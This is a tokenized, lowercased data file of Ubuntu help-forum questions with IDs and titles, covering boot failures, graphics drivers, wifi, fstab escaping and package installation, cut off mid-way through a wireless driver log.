192994	can not restart ubuntu after replacing unity with gnome and purging lightdm	i am running ubuntu 11.10 . i used the directions here to replace unity with gnome . it seemed to work fine until the end of step 2 when i rebooted the computer . when i chose the default option , i just got a black screen . when i choose the restore option and then `` restore normal boot '' i get starting load fallback graphics devices [ fail ] starting gnome display manager [ ok ] starting userspace bootsplash [ ok ] stopping gnome display manager [ ok ] stopping userspace bootsplash [ ok ] starting web server apach22 [ fail ] ( among a lot of oks ) it finally gets to stopping system v runlevel compatibility [ ok ] where it hangs . i left it overnight and just had a blank screen when i checked it in the morning . i can `` drop to root shell prompt '' and `` drop to root shell prompt with networking '' . i did see here that one should be able to fix the problem by choosing remount and then doing apt-get install lightdm i tried this as root shell with and without networking and got the message err http : //us.archive.ubuntu.com/ubuntu/ oneric-updates/main lightdm i386 1.0.6-0ubuntu1.7 could not resolve 'us.archive.ubuntu.com/ubuntu' what is the best way to resolve this problem ? thanks , peter .
192998	backtick ( grave accent ) button sticking	i have ubuntu 12.04 running in a virtual box virtual machine , on my windows 7 32bit system . it has been working great , except that the backtick/tilde button sticks ( not physically ) . when i hit the backtick button it keeps repeating until another input button is pressed . so if i press the spacebar while the backtick is repeating , it stops , but if i press the shift while it is repeating , the backtick turns into a tilde , and the tilde keeps repeating until i release the shift key ( at which point it 's a backtick again and keeps repeating ) . this sticking behavior only happens with the backtick key , and only in my ubuntu virtualization , never in windows . i 've tried both my laptop 's keyboard and an external usb keyboard and the problem happens on both . both keyboards i 've tried are japanese 106/109 key layout , but i 'm using them with a english ( us ) 101 profile . when i refer to the backtick key above , i mean where it is on the us layout . if i use the japanese profile , the key in that location ( the us backtick location ) still sticks , but its no longer mapped as the backtick key . any thoughts as to what might be causing this and possible solutions ? i 've searched a lot , but have not found any help so far . any help is greatly appreciated . additional info : i booted linux from a usb key , and found it did not have this stuck key problem . so it appears to be something with virtual box .
193005	how do i hide my custom unity panel indicators from another user account on the same machine ?	i created a second user account on my machine , making it a `` standard '' user account . when i log into that account , most of the panel indicators i 've added in my own administrator user account show up here as well -- but not all of them ( e.g. , the cpufreq indicator shows up in both accounts , but the multiload indicator does not show up in the second account ) . i 'd like to prevent everything but the default panel indicators from a fresh ubuntu install showing up in the second user 's panel . edit 1 : this is all i see in /etc/skel ... $ ls -al /etc/skel total 40 drwxr-xr-x 2 root root 4096 apr 25 12:07 . drwxr-xr-x 160 root root 12288 sep 25 21:44 .. -rw-r -- r -- 1 root root 220 apr 3 11:58 .bash_logout -rw-r -- r -- 1 root root 3486 apr 3 11:58 .bashrc -rw-r -- r -- 1 root root 8445 apr 16 14:09 examples.desktop -rw-r -- r -- 1 root root 675 apr 3 11:58 .profile
193007	what do the terminologies related to amd graphics and ubuntu mean ?	i have an amd radeon hd 4850 graphics card , with the latest amd catalyst drivers installed.i would like to better understand how things work . what do the terminologies related to amd graphics cards and ubuntu mean ? what do x.org , fglrx and randr mean ? related to the catalyst driver , why in the info section of the control centre it says catalyst version is 12.6 , but catalyst control centre is 2.14 ? what is the difference between catalyst and catalyst control centre ? also , why is the driver packaging version 8.98 while the driver package says 12.6 ? as well as in the installer , what is the difference between choosing `` install driver 8.98 on x.org 6.9 or later '' and `` generate distribution specific driver package '' ? i would like to understand what these things mean . hopefully others can learn from this and better understand their graphics cards and ubuntu .
193009	`` vidalia detected that the tor software exited unexpectedly . ''	i can start and kill tor via command line , but i want to control it with vidalia . the browser bundle works , but i 'd rather not use it . this is the message log in vidalia : sep 25 19:29:13.696 [ notice ] tor v0.2.3.22-rc ( git-4a0c70a817797420 ) running on linux . sep 25 19:29:13.696 [ notice ] tor ca n't help you if you use it wrong ! learn how to be safe at https : //www.torproject.org/download/download # warning sep 25 19:29:13.696 [ notice ] read configuration file `` /home/brian/.vidalia/torrc '' . sep 25 19:29:13.697 [ notice ] initialized libevent version 2.0.16-stable using method epoll ( with changelist ) . good . sep 25 19:29:13.697 [ notice ] opening socks listener on 127.0.0.1:9050 sep 25 19:29:13.697 [ warning ] /var/run/tor is not owned by this user ( brian , 1000 ) but by debian-tor ( 114 ) . perhaps you are running tor as the wrong user ? sep 25 19:29:13.697 [ warning ] before tor can create a control socket in `` /var/run/tor/control '' , the directory `` /var/run/tor '' needs to exist , and to be accessible only by the user account that is running tor . ( on some unix systems , anybody who can list a socket can connect to it , so tor is being careful . ) sep 25 19:29:13.698 [ notice ] closing partially-constructed socks listener on 127.0.0.1:9050 sep 25 19:29:13.698 [ warning ] failed to parse/validate config : failed to bind one of the listener ports . sep 25 19:29:13.698 [ error ] reading config failed -- see warnings above .
193010	ubuntu software center is not allowing me install nintendo ds emulator , giving a message `` check the internet connection ''	the software center did n't work and ask to check connection but my internet connection is working . also , sometimes it says i have an a problem and asks me if i want to report it . anway , how could i install the nintendo ds emulator .
193011	how to install netbeans 7.2 on latest ubuntu	i want to install the latest netbeans ( i.e . 7.2 ) , but ubuntu software center only gives me 7.0.1 . how to i install netbeans 7.2 on the latest ubuntu 12.04 ? thanks
193013	apostrophe in fstab	can 's get a window 's directory to mount due to an apostrophe . the relevant bit of fstab : # auto-mount windows drive uuid=0c1c51021c50e86a /media/windows ntfs defaults 0 0 # auto-mount the music folder /media/windows/documents\040and\040settings/foo\040name/my\040documents/my\040music/foo's\040music /home/foo/music none bind 0 0 note that i 'm using the \040 to escape spaces , but man ascii does n't ( from what i see ) have an escape character for a ' . i 've tried \047 to no avail thoughts ?
193015	mirroring ubuntu on several systems in a computer lab	i am working in a new refugee school where the only internet service available is a slow satellite connection . we are about to set up a computer lab ( already have desktop systems and am about to install ubuntu on them ) . i 'm a newbie when it comes to linux , but it seems a better alternative than pirated copies of windows . i 'd like to set up one ubuntu system , and then mirror that system on perhaps ten to twenty other systems ( all of which would be on an ethernet network ) . i expect to have an internet connection on the one system that i set up , but then it may be difficult to have enough bandwidth to go through all the same steps on the other ten+ systems . appreciate any help you can give . -- harvey
193016	how can one create hud options for an application without a global menu , such as a wine application ?	i use a music notation program called finale with wine on ubuntu . it is a great program , but its menus can be a bear to navigate and look for everything , especially if i know just the name of what i need . is there a way that i could create artificial hud options for this program ? there is a bunch of menus on the top of the screen , and i was n't sure if there was a way to make them into hud-searchable menus . if this is not doable in wine , can it be done for any other linux application that does not have global menu support yet ? ( the few programs out there that are this way , that is : p )
193017	is it normal for thousands of files to be opened by ubuntu programs ?	having used lsof , as suggested in too many open files - how to find the culprit , i 've found that thousands of files are open due to operating-system style programs such as unity-2d- , gnome-do , and nautilus . only one of the top 50 is an application-style program ( firefox ) . lsof | perl -lane ' $ x { `` $ f [ 0 ] : $ f [ 1 ] '' } ++ ; end { print `` $ x { $ _ } \t $ _ '' for sort { $ x { $ a } < = > $ x { $ b } } keys % x } ' | tail -50 lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /var/lib/lightdm/.gvfs output information may be incomplete . 216 unity-2d-:26285 216 unity-2d-:31600 216 unity-2d-:2577 239 nautilus:30626 239 nautilus:3777 239 nautilus:31250 239 nautilus:30781 239 nautilus:15101 241 nautilus:26123 241 nautilus:20495 241 nautilus:9627 241 nautilus:31612 241 nautilus:26298 243 nautilus:7672 243 nautilus:603 243 nautilus:21594 243 nautilus:2590 243 nautilus:17574 243 firefox:9768 243 nautilus:12422 247 nautilus:14265 256 gnome-do:31632 256 gnome-do:20519 256 gnome-do:26318 256 gnome-do:9647 256 gnome-do:26143 257 gnome-do:12437 257 gnome-do:14284 257 gnome-do:21612 257 gnome-do:622 257 gnome-do:7686 257 gnome-do:2608 257 gnome-do:17603 270 unity-2d-:3756 270 unity-2d-:30612 272 unity-2d-:15087 277 unity-2d-:12408 277 unity-2d-:21580 278 unity-2d-:2576 278 unity-2d-:14251 278 unity-2d-:587 279 unity-2d-:9613 279 unity-2d-:30768 279 unity-2d-:20481 280 unity-2d-:26109 281 unity-2d-:26284 283 unity-2d-:31599 284 unity-2d-:31235 288 unity-2d-:7658 290 unity-2d-:17559 is this normal , or is something wrong ?
193018	libreoffice calc appears in launcher as a white icon	when i try to open a .xls file sometimes appear a white icon on launcher instead of the green open office calc icon . besides , when this problem happens , it doesnt allow me to open more than one file at a time and of course , the arrows next to the icon does n't appear as well , what is happening ? is there a way to solve this ?
193030	update from 10.10 to 12.04 without backup	i want to update by ubuntu 10.10 to 12.04 lts . is there any way i can do it without backing up the data that is there in my drive . i have been using 10.10 for a long time . and i like the new 12.04 lts and have used it for a while on my friends laptop . thank you .
193034	grub loading unknown file system grub rescue	i am new to linux . i had windows 7 installed in my laptop . yesterday i installed ubuntu 9.0 from a free cd i got . i choose the option `` install side by side with windows 7 loader ( something like that.. ) '' . everything went fine & i installed ubuntu . when i restarted , i could easily boot from both windows 7 & ubuntu . but later when i booted from windows 7 , i did a disk management by right clicking `` my computer '' & choosing the option `` manage '' . actually i deleted a drive & added that empty volume in another drive . now when i start my system it shows the following error : grub loading unknown file system grub rescue > i have no clue what to do now . please help me at urgent . any solution in layman 's language is greatly appreciated . p.s . i want all my files on both windows 7 & ubuntu .
193039	how to get the hostname using terminal command-line ?	i have used arp-scan in terminal to get the ipaddress as well as mac address , is there anyway i can get to know the hostname of the ipaddress that are there in the terminal ? for example there are a-pc and b-pc and c-pc connected to the same router . i need to get the hostname the same way i got the result in arp-scan . is there any command ? please reply to this . thank you . ps : i dont want to use wireshark or any other s/w . it would be helpful if there was a terminal command .
193043	computer restarted during upgrade now i ca n't log in , how do i fix it ?	i was upgrading from 11.10 to 12.04 and the upgrade froze , and then booted me out to the login screen . from there i ca n't do anything , trying to log in just returns me to the login screen . what do i do ?
193049	problem with ubuntu 11.04 server while installing windows virtual machine on it	*i have installed windows virtual machine on ubuntu 11.04 server.for every boot , windows vm asks for os cd in server but the ubuntu desktop vm 's reboots properly . how can i resolve this problem ? i need windows vm to boot properly without asking for os cd ? *
193055	how to make files accessible only by root ?	i 'm using ubuntu and i 'm here to know is there any way to modify access of a specific application so that it can only root has access to it ? currently that application can be launched by general users but i want to make it so that only root can do this .
193057	x fails to start with five displays multi-desktop fglrx	fresh install of 12.04.1 lts x86-64 , sapphire flex hd6950 video card . i initally booted with one display connected , added the other four , and they all worked ( cloned ) i can set them to `` multi-display desktop '' and get five independent displays , but each has its own unity bars . ( i eventually want to merge four of these into a single work area treated as one display ) in pursuit of xinerama , i set them to `` single display desktop ( multi-desktop ) '' , which requires a restart . during the subsequent boot , x fails to start . interesting bit from the end of /var/log/xorg.0.log : [ 14.517 ] ( ii ) fglrx ( 4 ) : [ uki ] drm interface version 1.0 [ 14.517 ] ( ii ) fglrx ( 4 ) : [ uki ] created `` fglrx '' driver at busid `` pci:1:0:0 '' [ 14.517 ] ( ii ) fglrx ( 4 ) : [ uki ] added 8192 byte sarea at 0x2000 [ 14.517 ] ( ii ) fglrx ( 4 ) : [ uki ] mapped sarea 0x2000 to 0x7fb706a97000 [ 14.518 ] ( ii ) fglrx ( 4 ) : [ uki ] framebuffer handle = 0x3000 [ 14.518 ] ( ii ) fglrx ( 4 ) : [ uki ] added 1 reserved context for kernel [ 14.518 ] ( ii ) fglrx ( 4 ) : swldriscreeninit done [ 14.518 ] ( ee ) fglrx ( 4 ) : not enough video memory to allocate primary surface ( frame buffer ) . [ 14.518 ] ( ii ) fglrx ( 4 ) : shutdown cmmqs [ 14.518 ] ( ii ) fglrx ( 4 ) : [ uki ] removed 1 reserved context for kernel [ 14.518 ] ( ii ) fglrx ( 4 ) : [ uki ] unmapping 8192 bytes of sarea 0x2000 at 0x7fb706a97000 [ 14.518 ] ( ww ) fglrx ( 4 ) : *********************************************************** [ 14.518 ] ( ww ) fglrx ( 4 ) : * dri initialization failed * this line in particular drew my attention : fglrx ( 4 ) : not enough video memory to allocate primary surface ( frame buffer ) . the card has two gigabytes of memory . i 'm using latest stable driver from amd ( 12.8 ) , built .debs with this guide : what is the correct way to install ati catalyst video drivers ? somebody else that has had this error worked around it with the `` nopat '' kernel param ; i tried that and it did n't help ( https : //bugs.launchpad.net/ubuntu/+source/fglrx-installer/+bug/1004546 ) i also messed with serverlayout in xorg.conf a bit , wondering if 9600 horizontal pixels was too much : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` amdcccle-screen [ 1 ] -1 '' 1920 0 screen `` amdcccle-screen [ 1 ] -2 '' 3840 0 screen `` amdcccle-screen [ 1 ] -3 '' 5760 0 # my failure occurs with either of these lines : screen `` amdcccle-screen [ 1 ] -4 '' 5760 1200 # screen `` amdcccle-screen [ 1 ] -4 '' 7680 0 endsection update : 3840 limit ? when i use the ubuntu displays configurator instead of amd 's thing , it seems to tell me that there 's a hard limit of 3840x3840 for the entire virtual desktop : requested position/size for crtc 149 is outside the allowed limit : position= ( 3840,3840 ) , size= ( 1920 , 1200 ) , maximum= ( 3840,3840 ) googling around , i see others encountering the same error with a variety of maximum limits - how is this number derived ? how might i increase it ? as a workaround for now i can rearrange the screens on this dialog to fit inside the 3840x3840 square , but that does n't reflect the physical layout of my displays . i do n't have enough rep yet on this stack exchange site to embed an image , but here 's the dialog with the 3840 limit : http : //i.stack.imgur.com/ckald.png
193059	empathy sign-in automatically	when i start my machine the empathy starts unavailable until i press on the chat icon at the upper right edge of the screen and set it as available how can empathy start automatically after user logon ?
193062	higher cpu usage in ubuntu 12.04 than windows 7	hi i have a intel core i5 with 6gb of ram using ubuntu 12.04 64bit . i noticed that whenever i run chrome which is the faster browser for me in linux ) when i watch youtube , the cpu usage for chrome is at least 13 % and sometimes even 30 % . but in windows 7 same thing ( youtube on chrome ) rarely uses more than 6 % of my cpu usage . i also notice my laptop is so hot in ubuntu 12.04 and the fan is working all the time , while in windows the laptop is so silent and the fan doesnt make much noise all the time and not as warm as in linux . is it like that for every one or is it just me ?
193068	error while `` make check '' for glib-2.32.4	i get the following error while installing glib . error : thread.c:147 : test_thread4 : assertion failed : ( thread == null ) . can anyone let me know what is the issue ?
193069	how can i upgrade my server 's kernel without rebooting ?	this is a loaded question because i 'm already aware of , and am very interested in ksplice . the problem is that since they were bought by oracle , they have been forced to pull numerous server distributions from the offerings . the answer is n't as simple as it once was . i noticed a question on unix.se that states : you can build your own ksplice patches to dynamically load into your own kernel great ! but how ? ! i 've installed the free ksplice package in the repo on my desktop ( not ksplice-uptrack which is non-free ) and now want to generate and apply updates . what 's the process ? are there any scripts out there to automate the process ? moreover , if all the machinery required for rebootless upgrades is sitting there in the kernel ( and ksplice package ) , why on earth are n't we taking advantage of it by default ? quite recently kgraft was announced . it seems to be roughly the same result so if you have an answer that involves it , i 'd be just as happy with that . it 's currently a few months from being released though . note 1 : i am happy for a solution beside ksplice but it has to deliver the same thing : rolling updates to the kernel that can be applied without rebooting the server . note 2 : i 'll say it again ; the main ksplice `` service '' does not support ubuntu server . it used to but it does n't any more . when i talk about wanting to use ksplice , i 'm talking about the open source tools in the ksplice package . any answer that talks about ksplice-uptrack is probably not what i 'm after as this is the part that integrates directly with aforementioned `` service '' .
193072	how to use the new adobe source code pro font ?	adobe released a new , open source font family called `` source code pro '' ( download here , slashdot article here ) . how do i install it ?
193074	have to run sudo dhclient eth0 automatically every boot	i just installed ubuntu 12.04.1 alternative install ( for raid 0 on some disks ) . i have some problems with the net . i 'm at school , we use cable , and it got ipv6 . if i run ifconfig eth0 heres my output : eth0 link encap : ethernet hwaddr e0 : cb:4e:87 : ff : db inet addr:128.39.194.217 bcast:128.39.194.223 mask:255.255.255.224 inet6 addr : 2001:700:1100:8008 : e2cb:4eff : fe87 : ffdb/64 scope : global inet6 addr : fe80 : :e2cb:4eff : fe87 : ffdb/64 scope : link inet6 addr : 2001:700:1100:8008:48f7 : c23:1d87 : da6c/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:1063378 errors:0 dropped:0 overruns:0 frame:0 tx packets:489811 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1577173461 ( 1.5 gb ) tx bytes:37043669 ( 37.0 mb ) interrupt:68 base address:0x6000 my /etc/network/interfaces look like this : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # networkmanager # iface eth0 inet dhcp # networkmanager # hostname 2001:700:1100:1 : :4 # this is an autoconfigured ipv6 interface iface eth0 inet6 auto ( i had to remove the hash tags , because of the bigfont i get on ask ubuntu ) the `` network manager '' says that i 'm not connected . let me know if you need any more information . : )
193078	starting libeoffice from the command line opening a csv file does not produce a clickable launcher icon	whenever i open a cvs file from the command line using the cmd 'libreoffice -- calc my_file ' and libreoffice was not previously started i do not get a launcher icon for libreoffice calc . therefore whenever i open or activate any other program i need to minimize that window in order to get to the calc window again . the error might seam un-important , but i work a lot with csv files and the command line . and to always have to minimize the window in front of the libreoffice calc instance is tedious ! i have read some questions describing exactly the same issue here and none of them was answered with a way to fix that issue . just some ( working ) time by time workarounds . the one that did work for me is to 'xkill ' the launcher . afterwards i have the calc icon . but that is not really a good solution ! please this can not be too hard to fix ! oh - i use ubuntu 12.04
193087	replacement of alt-f2 ( gnome2 ) in recent kde	i am currently on ubuntu 10.10 and use alt+f2 quiet a lot . i can enter commands i can enter paths ... and i have autocompletion for example to open /home/myuser i can type /ho/my i will upgrade to the newest ubuntu and do not like unity etc . so i will switch to kde . is there a replacement for that functionality in kde ?
193094	the disk drive for / is not ready yet or not present	unfortunately i experienced a power failure during an update from ubuntu server 10.04 lts to 12.04 lts ( it was a power failure of more then 40 minutes so batteries charge of the ups were n't enough ) . when i restarted the server and ubuntu is starting i have to input the passphrase to unlock the encrypted partitions of the disks ( all are encrypted ) but also if the / is correctly decrypted appears the message : the disk drive for / is not ready yet or not present press s to skip or m to mount it manually . with option s results are that every partition based on / is not mounted . with option m a reduced shell is active and i am able to mount the partition manually because after the mount a ls -la command shows my directories ( also if /home contents does n't look very good ) but in the reduced shell i a not able to do much more then mount and ls . how can i correct definitively the situation ? about the disk encryption : probably it was n't a good choice in practice i need encryption security only for the data meaning user directories and data directories shared using samba . i would appreciate every comment , suggestion and criticism about disk encryption because it is very useful but prevents the possibility to remotely turn off and on the server that actually is a new constraint for me so i can happily accept a solution permitting to start up the server and then after it will go up enable and mount the encrypted partitions ( hopefully it would work also from a remote console ) .
193100	how can i set up eclipse to work with a quickly program ?	i 've installed pydev in eclipse and have configured my project so that the project lies under workspace/eclipse and the quickly files lies under workspace/quickly . to connect the two i 've linked the quickly project by creating a new folder in eclipse under the project and select the `` advanced option '' in the dialog to link a folder into the project . that way i do n't need to have the eclipse project files in my quickly project . but there is two issues that arises for me : in eclipse i have to select a python interpreter and i have no idea what to do . i 've googled around for an answer but i ca n't find if quickly uses python 3 or 2.7 . can someone help me make an informed choice ? ( i 'm new to developing python , that 's why i ca n't tell the difference by the syntax - if there even is a difference ) i ca n't press the `` run '' button to launch the application . must i initialize a program with quickly run ? i want to be able to debug through eclipse , how do i configure this ? i 'm using ubuntu 12.04.1 lts and the eclipse version from the repositories .
193102	connecting a reliance zte ac2737 netconnect + modem	i have a reliance netconnect+ zte ac2737 . it has an allocated data of 5gb per month . the modem works fine only after the allocated data is over , for which i have to pay extra to the provider . i tried contacting the provider , but it was not of much help . the system detects the modem every time . i assume that it must be a possible problem with the provider , so is there any chance it is the problem of ubuntu 12.04 lts 64 bit itself as i have no other reason to think otherwise an it works fine every time on windows .
193103	ubuntu install and dual boot with windows 8 uefi	i have ubuntu 12.04 x64 iso , i load it on a fat32 usb . my notebook has a hdd with gpt where i installed official win 8 pro x64 ( final versi贸n ) , i partitioned the whole hdd , previously of win 8 install , and bios is set with uefi boot . my bios notebook does n't support secure uefi boot . so i boot the notebook from usb and the grub runs ok showing whether to run ubuntu live or to install , but neither one neither two works , when i choose then the screen shows black and nothing happen , it does n't start/loads the install program . i 've try whether to prepare the usb with unetbootin , or just direct copy/paste the files onto the usb . i also have try wubi , but neither with success , it launch an error when ending .
193107	grub not showing installed kernels	although i have several kernel versions in /boot and having them in my grub.cfg , they are not displayed in the grub boot menu . running update-grub seems to work , as it puts the kernels in the grub.cfg in /boot/grub . issueing it gives the following output : generating grub.cfg ... cat : /boot/grub/video.lst : datei oder verzeichnis nicht gefunden found linux image : /boot/vmlinuz-3.2.0-31-generic found initrd image : /boot/initrd.img-3.2.0-31-generic /usr/sbin/grub-probe : fehler : no such disk . /usr/sbin/grub-probe : fehler : no such disk . found linux image : /boot/vmlinuz-3.2.0-30-generic found initrd image : /boot/initrd.img-3.2.0-30-generic /usr/sbin/grub-probe : fehler : no such disk . /usr/sbin/grub-probe : fehler : no such disk . /usr/sbin/grub-probe : fehler : no such disk . done i do n't know how to fix that problem . reinstalling grub via live cd did not help .
193110	microphone crackling in ubuntu 12.04	i am not very experienced in linux and have this problem with microphone which works fine on windows . microphone is external one and when listening to recorded sound ( both sound recorder and skype echo test ) you can hear crackling noise . i fixed output crackling by replacing load-module module-hal-detect with load-module module-hal-detect tsched=0 in /etc/pulse/default.pa but i have no idea how to fix input . hardware info : card : hda ati sb chip : realtek alc272x thanks for help !
193112	black screen while booting , after installing amd catalyst™ 12.8 proprietary linux x86 display driver on hp pavilion dm4	hp pavilion dm4 with configuration as shown below cpu intel core i5 2.26 ghz ram 4.0 gb graphics processor 512mb ati mobility radeon ( tm ) hd 5450 switchable graphics [ hdmi , vga ] . i installed ubuntu 10.04 ( without amd graphics driver ) it was working fine , but when i installed amd graphics drivers amd catalyst™ 12.8 proprietary linux x86 display driver , than the problem started from then when i boot i was get black screen . than i thought to upgrade from ubuntu 10.04 to 12.04 using the bootable pen drive but was getting black screen than read on some forums that was because of the switchable graphics , than upgraded ubuntu 12.04 by setting to `` nomodeset '' . it was working , again thought to install graphics driver amd catalyst™ 12.8 proprietary linux x86 display driver , again after installing this , when i boot i am getting blank screen . can anyone help me to install ubuntu 12.04 along with amd catalyst™ 12.8 proprietary linux x86 display driver . any help is highly appreciated .
193114	can not install automake and libboost-all-dev	i downloaded ubuntu 12.04 and installed it in a vmware workstation . and i 've been using all the installation commands : sudo apt-get install automake sudo apt-get install libboost-all-dev and some others , but it kept on saying : e : unable to locate package automake e : unable to locate package libboost-all-dev what could be the problem ?
193116	bright/dim controls wont work in 12.04	i have a gateway nv54 , and the controls wont work to brighten or dim the screen . the only way it does is if you change it to the setting you want , then restart the computer . any suggestions/drivers for this issue ?
193117	i have a rpm file how do i convert to deb file for running on ubuntu ?	i have a *.rpm file that i like to install on ubuntu . is it possible to convert a *.rpm to *.deb package ?
193119	intel速 wifi link 5100 - no wireless networks found - ubuntu 12.04	i have a random computer called a seneca data carbon 14 . made by a small ny company . i loaded 12.04 lts on it and i ca n't get wireless . ehternet works fine . the adapter is the intel速 wifi link 5100 . i have a feeling the wireless radio is off but the fn+f2 radio switch does nothing and the button that looks like a radio switch next to volume also does nothing . wireless led is off . i tried installing wicd and uninstalling network-manager . no luck . now i have both installed . i tried downloading the iwlagn driver and installing per chili555 's instruction but i 'm not sure it worked because as you can see below , iwlwifi seems prevalent . also , i got no indication that the iwlwifi was removed . i am running out of ideas and about to just go back to windows as a non wifi laptop is not that great . i also created a file in here are a few results : carbon @ carbon-pro : ~ $ rfkill list all 0 : cmpc_rfkill : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no carbon @ carbon-pro : ~ $ sudo modprobe iwlagn [ sudo ] password for carbon : carbon @ carbon-pro : ~ $ dmesg | grep iwl [ 23.137796 ] iwlwifi 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 23.137806 ] iwlwifi 0000:01:00.0 : setting latency timer to 64 [ 23.137830 ] iwlwifi 0000:01:00.0 : pci_resource_len = 0x00002000 [ 23.137833 ] iwlwifi 0000:01:00.0 : pci_resource_base = ffffc9000035c000 [ 23.137836 ] iwlwifi 0000:01:00.0 : hw revision id = 0x0 [ 23.138016 ] iwlwifi 0000:01:00.0 : irq 48 for msi/msi-x [ 23.138066 ] iwlwifi 0000:01:00.0 : detected intel ( r ) wifi link 5100 agn , rev=0x54 [ 23.138232 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 23.160065 ] iwlwifi 0000:01:00.0 : device eeprom ver=0x11f , calib=0x4 [ 23.160070 ] iwlwifi 0000:01:00.0 : device sku : 0xf0 [ 23.160097 ] iwlwifi 0000:01:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 23.395299 ] iwlwifi 0000:01:00.0 : loaded firmware version 8.83.5.1 build 33692 [ 23.400039 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 23.898631 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 23.901656 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 23.937458 ] iwlwifi 0000:01:00.0 : hardware error detected . restarting . [ 23.937464 ] iwlwifi 0000:01:00.0 : loaded firmware version : 8.83.5.1 build 33692 [ 23.937536 ] iwlwifi 0000:01:00.0 : start iwl error log dump : [ 23.937538 ] iwlwifi 0000:01:00.0 : status : 0x00040220 , count : -1222849788 [ 23.937542 ] iwlwifi 0000:01:00.0 : 0x9d93948f | advanced_sysassert [ 23.937545 ] iwlwifi 0000:01:00.0 : 0x74bc6c25 | upc [ 23.937547 ] iwlwifi 0000:01:00.0 : 0xd4d8eaf7 | branchlink1 [ 23.937550 ] iwlwifi 0000:01:00.0 : 0x79f929a3 | branchlink2 [ 23.937552 ] iwlwifi 0000:01:00.0 : 0x25185faf | interruptlink1 [ 23.937555 ] iwlwifi 0000:01:00.0 : 0x7367ef6f | interruptlink2 [ 23.937557 ] iwlwifi 0000:01:00.0 : 0x7686c34c | data1 [ 23.937559 ] iwlwifi 0000:01:00.0 : 0x6f06c975 | data2 [ 23.937562 ] iwlwifi 0000:01:00.0 : 0xfbaf3acb | line [ 23.937564 ] iwlwifi 0000:01:00.0 : 0xf7c9dd06 | beacon time [ 23.937566 ] iwlwifi 0000:01:00.0 : 0x7d93d56f | tsf low [ 23.937569 ] iwlwifi 0000:01:00.0 : 0x4c3ed509 | tsf hi [ 23.937571 ] iwlwifi 0000:01:00.0 : 0xfd0daafe | time gp1 [ 23.937573 ] iwlwifi 0000:01:00.0 : 0x6eefe341 | time gp2 [ 23.937576 ] iwlwifi 0000:01:00.0 : 0x66ff4ff5 | time gp3 [ 23.937578 ] iwlwifi 0000:01:00.0 : 0x28e5c81e | ucode version [ 23.937580 ] iwlwifi 0000:01:00.0 : 0x97f79493 | hw version [ 23.937583 ] iwlwifi 0000:01:00.0 : 0x4fffdb4f | board version [ 23.937585 ] iwlwifi 0000:01:00.0 : 0x6530d9e0 | hcmd [ 23.937588 ] iwlwifi 0000:01:00.0 : csr values : [ 23.937590 ] iwlwifi 0000:01:00.0 : ( 2nd byte of csr_int_coalescing is csr_int_periodic_reg ) [ 23.937596 ] iwlwifi 0000:01:00.0 : csr_hw_if_config_reg : 0x00480303 [ 23.937601 ] iwlwifi 0000:01:00.0 : csr_int_coalescing : 0x00000040 [ 23.937606 ] iwlwifi 0000:01:00.0 : csr_int : 0x20000000 [ 23.937611 ] iwlwifi 0000:01:00.0 : csr_int_mask : 0x00000000 [ 23.937617 ] iwlwifi 0000:01:00.0 : csr_fh_int_status : 0x00000000 [ 23.937622 ] iwlwifi 0000:01:00.0 : csr_gpio_in : 0x00000000 [ 23.937627 ] iwlwifi 0000:01:00.0 : csr_reset : 0x00000009 [ 23.937632 ] iwlwifi 0000:01:00.0 : csr_gp_cntrl : 0x080003c5 [ 23.937637 ] iwlwifi 0000:01:00.0 : csr_hw_rev : 0x00000054 [ 23.937642 ] iwlwifi 0000:01:00.0 : csr_eeprom_reg : 0x00000000 [ 23.937647 ] iwlwifi 0000:01:00.0 : csr_eeprom_gp : 0x90000004 [ 23.937652 ] iwlwifi 0000:01:00.0 : csr_otp_gp_reg : 0x00060000 [ 23.937658 ] iwlwifi 0000:01:00.0 : csr_gio_reg : 0x00080044 [ 23.937663 ] iwlwifi 0000:01:00.0 : csr_gp_ucode_reg : 0x00000000 [ 23.937668 ] iwlwifi 0000:01:00.0 : csr_gp_driver_reg : 0x00000000 [ 23.937673 ] iwlwifi 0000:01:00.0 : csr_ucode_drv_gp1 : 0x00000000 [ 23.937678 ] iwlwifi 0000:01:00.0 : csr_ucode_drv_gp2 : 0x00000000 [ 23.937683 ] iwlwifi 0000:01:00.0 : csr_led_reg : 0x00000018 [ 23.937688 ] iwlwifi 0000:01:00.0 : csr_dram_int_tbl_reg : 0x00000000 [ 23.937694 ] iwlwifi 0000:01:00.0 : csr_gio_chicken_bits : 0x27800200 [ 23.937699 ] iwlwifi 0000:01:00.0 : csr_ana_pll_cfg : 0x00880300 [ 23.937704 ] iwlwifi 0000:01:00.0 : csr_hw_rev_wa_reg : 0x0001001a [ 23.937709 ] iwlwifi 0000:01:00.0 : csr_dbg_hpet_mem_reg : 0xffff0000 [ 23.937712 ] iwlwifi 0000:01:00.0 : fh register values : [ 23.937726 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_stts_wptr_reg : 0x06607400 [ 23.937739 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_rbdcb_base_reg : 0x006626b0 [ 23.937752 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_wptr : 0x000000f8 [ 23.937765 ] iwlwifi 0000:01:00.0 : fh_mem_rcsr_chnl0_config_reg : 0x80819104 [ 23.937778 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_shared_ctrl_reg : 0x0000003c [ 23.937791 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_rx_status_reg : 0x07030000 [ 23.937805 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_rx_enable_err_irq2drv : 0x00000000 [ 23.937819 ] iwlwifi 0000:01:00.0 